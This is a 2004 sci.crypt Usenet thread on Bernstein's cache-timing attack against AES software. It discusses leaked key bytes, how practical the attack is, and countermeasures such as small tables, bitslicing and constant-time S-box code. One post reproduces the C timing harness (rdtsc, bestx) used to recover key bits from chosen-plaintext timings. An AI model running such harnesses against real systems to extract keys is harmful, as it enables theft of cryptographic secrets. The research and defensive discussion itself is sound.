is fairly fast [17 cycles/byte on an AMD64] for C code and is based off
the Rijndael teams "fast-alg" code.

I'm going to look at the SSL AES code and see if I can spot major
differences.

Tom

Phil Carmody

unread,
Nov 12, 2004, 7:00:36 AM11/12/04
to
"D. J. Bernstein" <d...@cr.yp.to> writes:

> http://cr.yp.to/papers.html#cachetiming

Interesting.

When you say that you 'reliably' leak 24 bits (bytes 1,5,9)
the third byte isn't 100% reliable, having 2 non-135 values.
I notice that the lowest bit of byte 0 is 0 for all but 2
of the values in your table. Is that statistically significant,
and if so would you consider it equally fair to say that that
particular implementation reliably leaked 25 bits, not 24?
(And by extension, some of the implementations that appear
to be leaking fewer bits might also be leaking more than they
first appear to.)

Is there any reason why AES implementations shouldn't also be
capable of leaking relations between bits even if they don't
leak explicit bits?

Phil
--
They no longer do my traditional winks tournament lunch - liver and bacon.
It's just what you need during a winks tournament lunchtime to replace lost
... liver. -- Anthony Horton, 2004/08/27 at the Cambridge 'Long Vac.'

BRG

unread,
Nov 12, 2004, 7:39:20 AM11/12/04
to
Tom St Denis wrote:

> BRG wrote:

[snip]


>>
>>
>> Thank you for the code. I have had to modify this for Windows and
>> Microsoft VC++ (7.1) and my revision is included below for those who
>> might want to try this out.
>>
>> After trying various combinations of AES tables I have not been able
>> to obtain any effects on either Intel P4 or VIA C3 processors.
>
> I found a string of "243" with his code [slightly modified to be more
> x86 portable asm...] in byte 1, but when I put in my rdtsc function
> [from my djaes code] I got strings of 245. So clearly what value that
> pops out is dependent on the analysis software cuz both can't be right.
>
> So the question now is why doesn't my AES code leak bytes too? My code
> is fairly fast [17 cycles/byte on an AMD64] for C code and is based off
> the Rijndael teams "fast-alg" code.

Since most fast AES software works in a similar way, it is unlikely that
the effect is present in some implementations and not in others.

But the effect is very dependent on setting up the AES tables in a way
that invokes specific cache behaviour.

If timing attacks are a concern, much smaller tables can be used. I
don't see the effect on any processors when AES is implemented with
small tables (this reduces the speed by a factor of about 2).

Brian Gladman

Francois Grieu

unread,
Nov 12, 2004, 8:51:38 AM11/12/04
to
As of the design of constant timing, fast, robust cryptographic
constructs, DJB's paper [1] offers a prize for a break of his

salsa10 construct. It is built from alternation of 32-bit
addition, xor, and constant rotations. See the paper for details.

salsa10 looks like an improved version of slash [2], with
better parallelizability of operations, and fewer operations (5/8);
also notable are a "butterfly" diffusion schedule, and more
irregular structure (randomized rotation constants, randomized
choice between add-then-xor or xor-then-add, and an additive
value that changes across rounds).
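
For concreteness, one step in that style looks roughly like this
(illustrative only; Salsa10's actual rotation constants and ordering
differ, see the paper):

#include <stdint.h>

#define ROTL32(v, n) (((v) << (n)) | ((v) >> (32 - (n))))

/* illustrative add-rotate-xor step, not Salsa10's actual round: no table
   lookups, no data-dependent branches, and only constant shift amounts,
   so the timing does not depend on the data */
void arx_step(uint32_t x[4])
{
    x[1] ^= ROTL32(x[0] + x[3], 7);
    x[2] ^= ROTL32(x[1] + x[0], 9);
    x[3] ^= ROTL32(x[2] + x[1], 13);
    x[0] ^= ROTL32(x[3] + x[2], 18);
}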

I guess DJB has some theory, or at least justifiable rule of
thumb, to decide the number of operations. Designers of SHA-x faced
the same issue. But neither had the gu^K^K^K imprudence to state it.

Any pointer to solid theory on the security level of this sort
of construct. e.g., most importantly, the effect of the number
of operations on differential/linear/impossible/unamit cryptanalysis?
And/or on the need for some amount of irregularity in the structure?


TIA,

Francois Grieu


[1] Daniel J. Bernstein: Cache-timing attacks on AES
<http://cr.yp.to/antiforgery.html#cachetiming>
<http://cr.yp.to/antiforgery/cachetiming-20041111.pdf>

[2] post on sci.crypt.research circa 2004-09-07
article <2q4o33F...@uni-berlin.de>
<http://google.com/groups?as_umsgid=2q4o33F...@uni-berlin.de>

D. J. Bernstein

unread,
Nov 12, 2004, 4:03:25 PM11/12/04
to
Phil Carmody wrote:
> the third byte isn't 100% reliable, having 2 non-135 values.

True. But the 135 becomes solid when the number of loops increases.

> I notice that the lowest bit of byte 0 is 0 for all but 2
> of the values in your table. Is that statistically significant,

Could be random. I didn't look for (and am not planning to look for)
further patterns; 24 leaked key bits is already unacceptable.

If you want to try extracting the entire key, you could look for more
patterns in the timings, or you could arrange for different sets of
variables to be touched before the AES call.

Markus Jansson

unread,
Nov 12, 2004, 5:26:07 PM11/12/04
to
D. J. Bernstein wrote:
> More than that: I'm saying that _typical_ software implementations of
> AES _do_ leak key bits to the simplest conceivable timing attack.

So? If you can get your hands on the physical computer and software that
is running it, you can get the key anyway (read it from the memory
etc.). Of course you have to do the actual encryptions in a secure
environment, because if you can't control the computer that runs them, you
are screwed anyway.

--
My computer security & privacy related homepage
http://www.markusjansson.net
Use HushTools or GnuPG/PGP to encrypt any email
before sending it to me to protect our privacy.

D. J. Bernstein

unread,
Nov 12, 2004, 7:00:48 PM11/12/04
to
Markus Jansson wrote:
> If you can get your hands on the physical computer and software that
> is running it, you can get the key anyway (read it from the memory etc.)

The attack doesn't read the key from memory. What it reads is the time
taken to compute AES_k(n) for selected values of n. It easily figures
out some key bytes from those timings.

Randy Howard

unread,
Nov 13, 2004, 11:20:32 AM11/13/04
to
In article <slrncp7p1b....@stoneport.math.uic.edu>, d...@cr.yp.to
says...

> BRG wrote:
> > If I am reading this correctly, his claim is not that AES is insecure
> > but rather that particular _implementations_ of AES might be insecure
> > because they might leak key bits when subject to timing attacks.
>
> More than that: I'm saying that _typical_ software implementations of
> AES _do_ leak key bits to the simplest conceivable timing attack. The
> underlying problem is that it's hard to do an S-box lookup in constant
> time on modern CPUs.

Is there any impact on this approach working on systems with more than
one processor (SMP or dual core) or with "virtual CPUs" (hyperthreading)
as opposed to a conventional UP system? How about the effects of other
application loads on a multitasking system impacting the results?

--
Randy Howard (2reply remove FOOBAR)

Erwann ABALEA

unread,
Nov 13, 2004, 12:03:39 PM11/13/04
to

I ran the time.c program along with the 6 AES implementations present in
aesbench.tgz (devine, gladman, mks, openssl, gpg, tom), on several
machines, one of which is a dual Celeron 560. Patterns also appear on this
machine.

The "worst" case was the "devine" implementation on a Pentium III. 50% of
the key bytes showed a repetitive pattern.

--
Erwann ABALEA <erw...@abalea.com> - RSA PGP Key ID: 0x2D0EABD5
-----
ED> >:)
You're using canned laughter (c)... Are you *really* a dinosaur?
I have my doubts...
-+-RG: Guide du Neueu Usenet - Prudence is the beginning of wisdom-+-

David Wagner

unread,
Nov 13, 2004, 12:04:25 PM11/13/04
to
Quoting from the paper:
"Of course, the same attacks can be carried out on AES
implementations exposed to the network."

Does anyone have any estimates for how many queries might be required?
It all comes down to the S/N ratio; does anyone have any information on
how large a bias the timing variability causes?

Does anyone know of an example of an AES implementation that can be
compromised in this way by a remote attacker on the other side of a
wide-area network link?

David Wagner

unread,
Nov 13, 2004, 12:07:11 PM11/13/04
to
One defense against cache timing attacks is to use bitslice
implementations. (Serpent, anyone?) In its simplest form, you can
reduce the function to be computed to a logical circuit, then evaluate
that circuit using AND, OR, NOT. This should be safe so long as the
time to compute AND, OR, and NOT instructions is not data-dependent in
any way, which seems like a plausible assumption.
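
A toy illustration of the technique (not AES's S-box): one machine word
holds bit i of the state for 32 independent blocks, so a single logical
instruction evaluates that gate for all 32 blocks at once.

#include <stdint.h>

/* toy bitsliced S-box (x -> x+1 mod 4), purely illustrative: hi and lo each
   hold one bit of the 2-bit state for 32 independent blocks, so two logic
   operations evaluate the S-box for all 32 blocks with no table and no
   data-dependent timing */
void toy_sbox_bitsliced(uint32_t *hi, uint32_t *lo)
{
    uint32_t new_hi = *hi ^ *lo;   /* hi' = hi XOR lo */
    uint32_t new_lo = ~*lo;        /* lo' = NOT lo    */
    *hi = new_hi;
    *lo = new_lo;
}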

Does anyone know whether one can implement AES efficiently using a
bitslice (or similar) strategy?

David Wagner

unread,
Nov 13, 2004, 12:18:45 PM11/13/04
to
It seems that the design of constant-time algorithms depends on
the implementation platform. On some 8-bit embedded processors,
data-dependent shifts and rotates are not constant-time, while AES
S-box computations may well be constant-time (whether due to the lack
of cache, or to other strategies for evaluating the AES S-box without
table lookups).

By the way, one way to compute the AES S-box in constant time is by
raising the input to the 254th power in GF(2^8), using constant-time
subroutines for squaring and multiplication. I think I first saw this
idea in a paper by Bloemer et al in SAC 2004.
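
A rough sketch of that idea in C (illustrative only, and of course far
slower than a table lookup): constant-time GF(2^8) multiplication using
masks instead of branches, inversion as x^254, and the AES affine map on
top.

#include <stdint.h>

/* multiply by x in GF(2^8) mod x^8+x^4+x^3+x+1, with no data-dependent branch */
static uint8_t xtime(uint8_t a)
{
    return (uint8_t)((a << 1) ^ ((a >> 7) * 0x1b));
}

/* constant-time GF(2^8) multiplication: always 8 iterations, masks instead of ifs */
static uint8_t gmul(uint8_t a, uint8_t b)
{
    uint8_t r = 0;
    int i;
    for (i = 0; i < 8; i++) {
        r ^= (uint8_t)(-(b & 1)) & a;
        a = xtime(a);
        b >>= 1;
    }
    return r;
}

/* inversion as a^254 (254 = 2+4+8+16+32+64+128); maps 0 to 0, as AES requires */
static uint8_t ginv(uint8_t a)
{
    uint8_t a2 = gmul(a, a), a4 = gmul(a2, a2), a8 = gmul(a4, a4);
    uint8_t a16 = gmul(a8, a8), a32 = gmul(a16, a16);
    uint8_t a64 = gmul(a32, a32), a128 = gmul(a64, a64);
    uint8_t r = gmul(a2, a4);
    r = gmul(r, a8);
    r = gmul(r, a16);
    r = gmul(r, a32);
    r = gmul(r, a64);
    return gmul(r, a128);
}

static uint8_t rotl8(uint8_t x, int n)
{
    return (uint8_t)((x << n) | (x >> (8 - n)));
}

/* AES S-box = affine map of the inverse; sanity checks: sbox(0x00) = 0x63,
   sbox(0x01) = 0x7c */
uint8_t sbox(uint8_t x)
{
    uint8_t y = ginv(x);
    return (uint8_t)(y ^ rotl8(y, 1) ^ rotl8(y, 2) ^ rotl8(y, 3) ^ rotl8(y, 4) ^ 0x63);
}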

BRG

unread,
Nov 13, 2004, 1:41:58 PM11/13/04
to
David Wagner wrote:
> One defense against cache timing attacks is to use bitslice
> implementations. (Serpent, anyone?) In its simplest form, you can
> reduce the function to be computed to a logical circuit, then evaluate
> that circuit using AND, OR, NOT. This should be safe so long as the
> time to compute AND, OR, and NOT instructions is not data-dependent in
> any way, which seems like a plausible assumption.

AES can be implemented without tables but it is very slow compared to
the normal methods. But it can also be implemented with quite small
tables at about half normal speed and I have not seen any timing
anomalies in this implementation.

Brian Gladman

David Wagner

unread,
Nov 13, 2004, 1:47:26 PM11/13/04
to
BRG wrote:
>But it can also be implemented with quite small
>tables at about half normal speed and I have not seen any timing
>anomalies in this implementation.

By "quite small", do you mean an 8-bit to 8-bit table
(e.g., for inversion in GF(2^8))? Or do you perhaps mean
the trick by which inversion in GF(2^8) can be expressed as
a few operations in GF(2^4), which I presume could be expressed
with 4-bit tables?

John Savard

unread,
Nov 13, 2004, 1:48:01 PM11/13/04
to
On Sat, 13 Nov 2004 17:18:45 +0000 (UTC), d...@taverner.cs.berkeley.edu
(David Wagner) wrote, in part:

>It seems that the design of constant-time algorithms depends on
>the implementation platform. On some 8-bit embedded processors,
>data-dependent shifts and rotates are not constant-time, while AES
>S-box computations may well be constant-time (whether due to the lack
>of cache, or to other strategies for evaluating the AES S-box without
>table lookups).

This is very true.

John Savard
http://home.ecn.ab.ca/~jsavard/index.html

Tom St Denis

unread,
Nov 13, 2004, 3:29:42 PM11/13/04
to

Good question. Someone should setup a challenge server that acts as a
random oracle to test this problem.

Tom

BRG

unread,
Nov 13, 2004, 4:25:32 PM11/13/04
to

I did think about these options but the one I was specifically thinking
of is different as all of these options are very slow in software.

The normal AES implementations use large tables of 4096 bytes each and
can have up to 4 such tables with a total table byte count of up to
16384 bytes (half this for encryption only). This puts a lot of
pressure on the cache in some machines and it is this that the timing
attack is able to exploit.

But AES can be implemented at about half maximum speed with two tables
each of 1024 bytes (or only 1024 bytes for encryption alone). While
this won't completely eliminate timing issues it is not pressing the
cache anywhere near as hard and will therefore be far less likely to be
easily exploitable.

It was this option that I had in mind. I have run DJB's timing attack on
this code on a P3 - where the attack works for large tables - and was
unable to see any timing effects with his code.
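
A sketch of the single-table idea (illustrative only, not the code I
tested; the exact byte order and rotation direction depend on the
implementation's word layout):

#include <stdint.h>

#define ROTR32(v, n) (((v) >> (n)) | ((v) << (32 - (n))))

/* illustrative sketch: keep only one 256-entry, 1 KB round table T0 and
   derive the other three columns as byte rotations of it, instead of
   storing four separate 1 KB tables */
extern const uint32_t T0[256];

uint32_t round_column(uint8_t b0, uint8_t b1, uint8_t b2, uint8_t b3)
{
    return T0[b0]
         ^ ROTR32(T0[b1], 8)
         ^ ROTR32(T0[b2], 16)
         ^ ROTR32(T0[b3], 24);
}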

Brian Gladman

D. J. Bernstein

unread,
Nov 13, 2004, 8:41:26 PM11/13/04
to
Erwann ABALEA wrote:
> I ran the time.c program along with the 6 AES implementations present
> in aesbench.tgz (devine, gladman, mks, openssl, gpg, tom), on several
> machines, one of them is a dual Celeron 560. Patterns also appear on
> this machine.

Thanks for the report.

> The "worst" case was the "devine" implementation on a Pentium III. 50%
> of the key bytes showed a repetitive pattern.

You shouldn't compare implementations based on how badly they flunk this
very simple test. Even if you don't take the serious cryptographer's
attitude that leaking a single key byte is a disaster, you should assume
that slightly more sophisticated attacks will obtain all the key bits.

D. J. Bernstein

unread,
Nov 13, 2004, 8:52:58 PM11/13/04
to
David Wagner wrote:
> It seems that the design of constant-time algorithms depends on
> the implementation platform. On some 8-bit embedded processors,
> data-dependent shifts and rotates are not constant-time, while AES
> S-box computations may well be constant-time

This is certainly an issue for RC6, although it doesn't bother me as
much as the lack of key agility in RC6.

> By the way, one way to compute the AES S-box in constant time is by
> raising the input to the 254th power in GF(2^8), using constant-time
> subroutines for squaring and multiplication. I think I first saw this
> idea in a paper by Bloemer et al in SAC 2004.

http://cr.yp.to/talks.html#2001.10.29, page 20, specifically identifies
input-independent timings as an advantage of this reciprocal strategy.
(I'm citing the Bloemer paper for other reasons.)

David Wagner

unread,
Nov 14, 2004, 12:57:10 AM11/14/04
to
D. J. Bernstein wrote:

>David Wagner wrote:
>> By the way, one way to compute the AES S-box in constant time is by
>> raising the input to the 254th power in GF(2^8), using constant-time
>> subroutines for squaring and multiplication. I think I first saw this
>> idea in a paper by Bloemer et al in SAC 2004.
>
>http://cr.yp.to/talks.html#2001.10.29, page 20, specifically identifies
>input-independent timings as an advantage of this reciprocal strategy.
>(I'm citing the Bloemer paper for other reasons.)

Thanks for pointing that out. I hadn't seen that before. I appreciate
the reference. I'll update my notes.

Douglas A. Gwyn

unread,
Nov 14, 2004, 2:19:28 AM11/14/04
to
David Wagner wrote:
> Does anyone know whether one can implement AES efficiently using a
> bitslice (or similar) strategy?

Sure, AES as well as most other block ciphers can be
implemented in various ways "in silicon", and most
of the obvious ones won't have caches. That's not
to say that key- or data-dependent timing variations
aren't still possible, but at least it's not as hard
for the implementor to take steps to avoid them.

ved...@hush.com

unread,
Nov 14, 2004, 9:16:59 AM11/14/04
to
"D. J. Bernstein" <d...@cr.yp.to> wrote in message news:<slrncpa77l....@stoneport.math.uic.edu>...

> Could be random. I didn't look for (and am not planning to look for)
> further patterns; 24 leaked key bits is already unacceptable.
>
> If you want to try extracting the entire key, you could look for more
> patterns in the timings, or you could arrange for different sets of
> variables to be touched before the AES call.

this being so,
it is curious why rijndael is still the 'aes',
and that the government hasn't advised a move to another symmetric algorithm,
pending further investigation.

can the cache timing attack be exploited to attack an already encrypted file,
or extract the key,
if one does not have access to the machine while it is encrypting?


vedaal

David Wagner

unread,
Nov 14, 2004, 4:10:52 PM11/14/04
to
ved...@hush.com wrote:
>this being so,
>it is curious why rijndael is still the 'aes',

Pick your favorite among the following possible reasons:
1) because this wasn't part of the threat model / evaluation criteria
for the AES.
2) because in many environments, this attack will either not pose a threat
or can be defended against adequately.
3) because most block ciphers out there suffer from the same issue.

David Wagner

unread,
Nov 14, 2004, 4:11:30 PM11/14/04
to
Douglas A. Gwyn wrote:
>David Wagner wrote:
>> Does anyone know whether one can implement AES efficiently using a
>> bitslice (or similar) strategy?
>
>Sure, AES as well as most other block ciphers can be
>implemented in various ways "in silicon", [...]

Sorry; I think I asked the wrong question. I meant, can one implement
AES efficiently in software using bitslice (or similar) strategies?

Douglas A. Gwyn

unread,
Nov 15, 2004, 1:22:22 AM11/15/04
to
David Wagner wrote:
> Sorry; I think I asked the wrong question. I meant, can one implement
> AES efficiently in software using bitslice (or similar) strategies?

I guess what you are suggesting is a special-purpose
periphral "crypto machine" that has a simple architecture.
In fact these exist; Motorola's AIM was the first I know
of offered to the general public. It could be programmed
to support several independent channels, each with its own
algorithm.

David Wagner

unread,
Nov 15, 2004, 2:45:51 AM11/15/04
to
Douglas A. Gwyn wrote:
>David Wagner wrote:
>> Sorry; I think I asked the wrong question. I meant, can one implement
>> AES efficiently in software using bitslice (or similar) strategies?
>
>I guess what you are suggesting is a special-purpose
>periphral "crypto machine" that has a simple architecture.

Nope. I'm referring to a particular implementation strategy,
in software only (using only whatever standard CPU you already have
access to), for implementing block ciphers. This implementation strategy
is distinguished by its use of logical bitwise operations (OR, AND, XOR,
NOT, etc.) on the microprocessor to perform 32 logical operations in
parallel (on a 32-bit microprocessor). Serpent is a famous example
of a cipher amenable to this implementation strategy. I was curious
whether there are any efficient ways to implement AES using this
kind of approach.

Colin Andrew Percival

unread,
Nov 15, 2004, 5:00:09 AM11/15/04
to
David Wagner <d...@taverner.cs.berkeley.edu> wrote:
> Sorry; I think I asked the wrong question. I meant, can one implement
> AES efficiently in software using bitslice (or similar) strategies?

Back before Rijndael became AES, I looked at doing this using the MMX
operations on the Pentium II (or was it the Pentium MMX? I'm not sure,
but it was something from that era) -- the idea being that you could
perform several modular inversions in parallel.

In terms of the simple operation count, it worked out to being about 1/3
of the speed of the lookup table approach, so I didn't pursue it any
further. If this is still a concern, I'll see if I can find my notes...
after I submit my thesis, get my viva scheduled, graduate, and escape
from Oxford. All my notes are in Vancouver.

Colin Percival

Michael Amling

unread,
Nov 15, 2004, 11:17:14 AM11/15/04
to

I think Dr. Wagner is referring to Biham's "bitslice" method of doing
32 or 64 DES encryptions in parallel using scalar registers, and asking
if it can be applied to AES. The bitslice technique can be implemented
in hardware or software. See "A Fast New DES Implementation in Software"
at http://www.cs.technion.ac.il/~biham/publications.html.
I'm sure AES can be implemented using the bitslice technique. The
question is whether that would be faster than a traditional
implementation, at least in those cases that can benefit from doing
several blocks in parallel.

--Mike Amling

David Wagner

unread,
Nov 15, 2004, 1:47:40 PM11/15/04
to
Michael Amling wrote:
> I think Dr. Wagner is referring to Biham's "bitslice" method of doing
>32 or 64 DES encryptions in parallel using scalar registers, and asking
>if it can be applied to AES. The bitslice technique can be implemented
>in hardware or software. See "A Fast New DES Implementation in Software"
>at http://www.cs.technion.ac.il/~biham/publications.html.

Right. Thanks for digging up the pointer.

> I'm sure AES can be implemented using the bitslice technique. The
>question is whether that would be faster than a traditional
>implementation, at least in those cases that can benefit from doing
>several blocks in parallel.

I'd settle for bitslice implementations just being "not too much slower"
than ordinary implementations of AES. The motivation was whether they
could serve as a defense against cache timing attacks without incurring
too much overhead.

karl malbrain

unread,
Nov 16, 2004, 1:24:41 PM11/16/04
to
d...@taverner.cs.berkeley.edu (David Wagner) wrote in message news:<cnatkc$1cgi$2...@agate.berkeley.edu>...
> Michael Amling wrote:

> > I'm sure AES can be implemented using the bitslice technique. The
> >question is whether that would be faster than a traditional
> >implementation, at least in those cases that can benefit from doing
> >several blocks in parallel.
>
> I'd settle if bitslice implementations just were "not too much slower"
> than ordinary implementations of AES. The motivation was whether they
> could serve as a defense against cache timing attacks without incurring
> too much overhead.

I've posted on my web site a variant of my AES implementation that
stores the S-box tables in banks of bits -- bit zero of all 256 entries
is stored in the first 32 bytes, then bit one of all 256 entries, and so
on. With the Intel cache line length of 32 bytes I
believe this version should resist the S-box timing attack.
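
A sketch of that layout (the names here are illustrative; the real code is
on the site):

/* sketch only, not the posted code: plane j holds bit j of all 256 S-box
   entries, 256 bits = 32 bytes = one cache line, so every lookup touches
   the same 8 cache lines no matter what x is */
extern const unsigned char sbox_planes[8][32];

unsigned char sbox_lookup(unsigned char x)
{
    unsigned char r = 0;
    int j;

    for( j = 0; j < 8; j++ )
        r |= (unsigned char)(((sbox_planes[j][x >> 3] >> (x & 7)) & 1) << j);
    return r;
}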

www.geocities.com/malbrain

karl m

Stefan Tillich

unread,
Nov 17, 2004, 12:49:49 PM11/17/04
to
Hi,

D. J. Bernstein schrieb:
> http://cr.yp.to/papers.html#cachetiming


>
> ---D. J. Bernstein, Associate Professor, Department of Mathematics,
> Statistics, and Computer Science, University of Illinois at Chicago

How exactly would an attacker exploit the timing information to
determine some key bytes in an actual attack?

You can determine the slowest index into the lookup (which is what you
do with the program in your paper), but for that you need knowledge of
the key.

You can also determine a plaintext byte which results in slowest lookup
(provided that you can choose the plaintext for the attacked device),
but that won't help you if you don't know the actual lookup index.

Any ideas?

Best regards
Stefan


Tom St Denis

unread,
Nov 17, 2004, 2:37:24 PM11/17/04
to

The attack actually does work. Why it works I'm not 100% sure. The
function he designed does emit a value which when xor'ed with the key
byte produces the same value over multiple runs. For instance you saw
us saying something like

byte 1, loops 256: 245 245 245 245 ...

That means for the 1st key byte the function returned "key ^ 245".
Since it's reliable you can then infer that key is actually the return
value xor'ed with 245.

The attack is highly sensitive to how the function was implemented
*and* compiled. That and it's effectively impossible to exploit in
virtually any system cuz well it's a chosen plaintext attack and has to
be run as close to the system as possible.

So for example, you'd have to be logged into Amazon, somehow getting an
SSL session to encrypt thousands of texts for you while not violating
the session [on either end] to get 24 out of 128 bits. Totally likely
scenario.

In cases where a local login and chosen plaintext venue is possible the
solution would be as simple as using the 1 table method [because the
other tables are just rotated versions]. 1KB of ram would easily fit in
practically any modern L1 cache and it would get many hits that would
significantly reduce the attack. Further than that you can compute the
sbox on the fly.

DJ should get credit for developing the attack cuz it's cool. Aside
from that though I wouldn't worry about it in the field. Well... be
"aware" of the attack and use it during your design but i don't think we
have to stop the world from spinning to replace AES just yet.

Tom

karl malbrain

unread,
Nov 17, 2004, 6:21:04 PM11/17/04
to
"D. J. Bernstein" <d...@cr.yp.to> wrote in message news:<slrncp8kf2...@stoneport.math.uic.edu>...
> Tom St Denis wrote:
> > Also if his intention was to suggest that implementations ought to
> > tighten up
>
> The paper spends a couple of pages explaining how expensive it is to
> avoid the four most obvious sources of variability in S-box timing. If
> you ever manage to write an AES implementation that doesn't have
> input-dependent timings, feel free to tell us exactly how slow it is.

I've posted on my site a version that shouldn't have input-dependent
timings and is only 10-20% slower than the naive table-driven
implementation.

www.geocities.com/malbrain/newaes3_c

karl m

BRG

unread,
Nov 18, 2004, 2:41:34 AM11/18/04
to

This will be very slow when compared with normal table driven
implementations of AES on modern Intel x86 family processors.

For large messages used with pre-computed key schedules, pretty well all
decent table driven versions of AES can achieve less than 30 cycles per
byte on modern x86 processors - what will your version achieve in such
situations?

In what circumstances do you think it will be only 10-20% slower?

Brian Gladman

Stefan Tillich

unread,
Nov 18, 2004, 2:45:00 AM11/18/04
to

Tom St Denis schrieb:


> Stefan Tillich wrote:
>
>> Hi,
>>
>> D. J. Bernstein schrieb:
>>
>>> http://cr.yp.to/papers.html#cachetiming
>>>
>>> ---D. J. Bernstein, Associate Professor, Department of Mathematics,
>>> Statistics, and Computer Science, University of Illinois at Chicago
>>
>>
>>
>> How exactly would an attacker exploit the timing information to
>> determine some key bytes in an actual attack?
>>
>> You can determine the slowest index into the lookup (which is what you
>> do with the program in your paper), but for that you need knowledge of
>> the key.
>>
>> You can also determine a plaintext byte which results in slowest
>> lookup (provided that you can choose the plaintext for the attacked
>> device), but that won't help you if you don't know the actual lookup
>> index.
>>
>> Any ideas?
>
>
> The attack actually does work. Why it works I'm not 100% sure. The
> function he designed does emit a value which when xor'ed with the key
> byte produces the same value over multiple runs. For instance you saw
> us saying something like
>
> byte 1, loops 256: 245 245 245 245 ...
>
> That means for the 1st key byte the function returned "key ^ 245". Since
> it's reliable you can then infer that key is actually the return value
> xor'ed with 245.

As far as I can see it, the output is (plaintext_byte ^ key_byte), which
would be the index into one of the T tables (in a 4 T-table
implementation). So IMHO you need to determine which such indexes result
in slower AES operation. To do this seems very unlikely in a real-world
setting.

The code in the paper demonstrates that there can be a dependency of AES
execution time on some index into T. What the paper is lacking (or what
should be done in a sequel paper) is a demonstration that key
bytes can be recovered at least in a controlled laboratory setting. If
this cannot even be done in an environment, where almost all parameters
are under the attackers control, then a real-world attack is infeasible.

>
> The attack is highly sensitive to how the function was implemented
> *and* compiled. That and it's effectively impossible to exploit in
> virtually any system cuz well it's a chosen plaintext attack and has to
> be run as close to the system as possible.

I agree. In my opinion, if an attack can be made then only if at least
the following information is known:
- Complete sourcecode of program which computes AES, compiler, compiler
version OR the object code
- Processor, cache organization, cache size, cache replacement strategy
- Operating system, version

>
> So for example, you'd have to be logged into Amazon, somehow getting an
> SSL session to encrypt thousands of texts for you while not violating
> the session [on either end] to get 24 out of 128 bits. Totally likely
> scenario.

As DJ said himself: To get 1 clock cycle out of timing noise due to
network latency is infeasible.

>
> In cases where a local login and chosen plaintext venue is possible the
> solution would be as simple as using the 1 table method [because the
> other tables are just rotated versions]. 1KB of ram would easily fit in
> practically any modern L1 cache and it would get many hits that would
> significantly reduce the attack. Further than that you can compute the
> sbox on the fly.
>
> DJ should get credit for developing the attack cuz it's cool. Aside
> from that though I wouldn't worry about it in the field. Well... be
> "aware" of the attack and use it during your design but i don't think we
> have to stop the world from spinning to replace AES just yet.

The least I expect from a paper on an attack is to demonstrate how it
can be done at least in the laboratory.

Best regards
Stefan Tillich

karl malbrain

unread,
Nov 18, 2004, 12:16:43 PM11/18/04
to
BRG <b...@nowhere.org> wrote in message news:<419c5229$0$4021$ed26...@ptn-nntp-reader01.plus.net>...

> karl malbrain wrote:
> > "D. J. Bernstein" <d...@cr.yp.to> wrote in message news:<slrncp8kf2...@stoneport.math.uic.edu>...
> >
> >>Tom St Denis wrote:
> >>
> >>>Also if his intention was to suggest that implementations ought to
> >>>tighten up
> >>
> >>The paper spends a couple of pages explaining how expensive it is to
> >>avoid the four most obvious sources of variability in S-box timing. If
> >>you ever manage to write an AES implementation that doesn't have
> >>input-dependent timings, feel free to tell us exactly how slow it is.
> >
> > I've posted on my site a version that shouldn't have input-dependent
> > timings and is only 10-20% slower than the naive table-driven
> > implementation.
> >
> > www.geocities.com/malbrain/newaes3_c
>
> This will be very slow whwn compared with normal table driven
> implementations of AES on modern Intel x86 family processors.

Only the S-Box and InvMixColumn functions are slower -- about 8 times
and 4 times respectively over their naive table lookup counterparts.



> For large messages used with pre-computed key schedules, pretty well all
> decent table driven versions of AES can achieve less than 30 cycles per
> byte on modern x86 processors - what will your version achieve in such
> situations?

The issue is whether a version of AES can be implemented that withstands
timing attacks. I don't claim that my posted version is optimized,
only that it displays constant time when compiled with a compiler that
issues instructions for ?: expressions without jumps. Microsoft VC
version 12.00.8804 is one such compiler. I've examined the assembly
code and there are no data-dependent jumps.
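
For illustration, the kind of selection involved (not a quote from the
posted code): a compiler that keeps ?: jump-free effectively produces the
masked form below.

/* illustrative: two ways to choose between a and b on a secret condition.
   The first may compile to a conditional jump (data-dependent timing);
   the second is the mask form that a jump-free ?: amounts to. */
unsigned select_branchy(int cond, unsigned a, unsigned b)
{
    return cond ? a : b;
}

unsigned select_masked(int cond, unsigned a, unsigned b)
{
    unsigned mask = (unsigned)-(cond != 0);   /* all ones if cond, else zero */
    return (a & mask) | (b & ~mask);
}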

> In what circumstances do you think it will be only 10-20% slower?

I compared to my previous naive table lookup program, also posted on
my site at www.geocities.com/malbrain/aes_c.html to get the 10-20%
figure. It's just a rough number derived from 74 MB in 1 Minute v.
1.20 minutes. Perhaps you'd be willing to insert the necessary CPU
instructions to obtain the cycles per byte figure you desire.

karl m

karl malbrain

unread,
Nov 18, 2004, 4:13:25 PM11/18/04
to
"D. J. Bernstein" <d...@cr.yp.to> wrote in message news:<slrncp7adr....@stoneport.math.uic.edu>...

> http://cr.yp.to/papers.html#cachetiming
>
> ---D. J. Bernstein, Associate Professor, Department of Mathematics,
> Statistics, and Computer Science, University of Illinois at Chicago

I've tried unsuccessfully to reproduce your results. I entered the
following functions from your paper. Perhaps you could illustrate my
error.

unsigned char in[4 * Nb], out[4 * Nb], key[4 * Nb];
unsigned expkey[Nb * (Nr + 1)];

__int64 rd_clock (void)
{
unsigned dwLow, dwHigh;

__asm {
rdtsc
mov dwLow, eax
mov dwHigh, edx
}
return ((__int64)dwHigh)<<32 | dwLow;
}

int aescycles ()
{
__int64 start, end;
int t;

do {
start = rd_clock();
Encrypt (in, expkey, out);
end = rd_clock ();
t = end - start;
} while( t<= 0 || t>= 1000);
return t;
}

int bestx (int b, int loops)
{
int bestx = 0, bestxt = 0;
int x, xt, i, j;

for( x = 0; x < 256; x++ ) {
xt = 0;
for( i = 0; i < loops; i++ ) {
for( j = 0; j < 16; j++ )
in[j] = xrandom() >> 16;
in[b] = x;
xt += aescycles(); xt += aescycles(), xt += aescycles();
xt += aescycles(); xt += aescycles();
}
if( xt > bestxt )
bestx = x, bestxt = xt;
}
return bestx;
}

void bernstein (char *seed)
{
int loops, b, j, k;

mrandom (strlen(seed), seed);

for( loops = 4; loops <= 65536; loops *= 2) {
for( b = 0; b < 16; b++ ) {
printf ("%.2d, %.5d loops:", b, loops);
for( k = 0; k < 10; k++ ) {
for( j = 0; j < 16; j++ )
key[j] = xrandom() >> 16;
ExpandKey (key, expkey);
printf (" %.2x", bestx (b, loops) ^ key[b]);
fflush (stdout);
}
printf ("\n");
}
}
}


The mrandom and xrandom functions are from the standard berkeley
library.

Thanks, karl m

David Wagner

unread,
Nov 18, 2004, 5:59:58 PM11/18/04